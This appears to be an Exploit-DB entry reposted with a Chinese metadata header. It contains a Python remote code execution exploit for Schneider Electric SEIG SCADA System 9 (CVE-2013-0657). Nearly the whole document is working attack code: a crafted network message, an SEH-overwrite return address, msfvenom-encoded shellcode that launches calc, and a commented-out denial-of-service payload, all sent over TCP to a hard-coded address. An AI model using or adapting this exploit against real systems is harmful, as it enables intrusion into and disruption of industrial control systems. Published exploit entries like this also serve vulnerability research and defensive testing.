SEIG SCADA System 9 – Remote Code Execution

  • 作者: Alejandro Parodi
    日期: 2018-08-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45218/
  • # Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
    # Author: Alejandro Parodi
    # Date: 2018-08-17
    # Vendor Homepage: https://www.schneider-electric.com
    # Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
    # Version: v9
    # Tested on: Windows7 x86
    # CVE: CVE-2013-0657
    # References: 
    # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
    
    import socket
    import struct
    
    ip = "192.168.0.23"
    port = 12397
    con = (ip, port)
    
    # DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
    # length = "\x00\x70\x00\x00\x00\x00\x00\x00"
    # message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
    # payload = length+message
    
    # Exploit Magic
    message_header = struct.pack("<L", 0x6014) + "\x66\x66\x07\x00"
    message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack(">H", 0x6000)
    padding = "B" * 3344
    eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)
    
    # Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python
    # If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
    nopsleed = "\x41"*100 # \x90 bad char bypass
    shellcode= "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"
    shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"
    shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"
    shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"
    shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"
    shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"
    shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"
    shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"
    shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"
    shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"
    shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"
    shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"
    shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"
    shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"
    shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"
    shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"
    shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"
    shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"
    shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"
    shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"
    shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"
    shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"
    shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"
    shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"
    shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"
    
    JUNK = "JUNK"*5202 # 20808 Bytes of JUNK
    
    payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
    print "Payload length: "+str(len(payload))
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(con)
    s.send(payload)
    s.recv(10)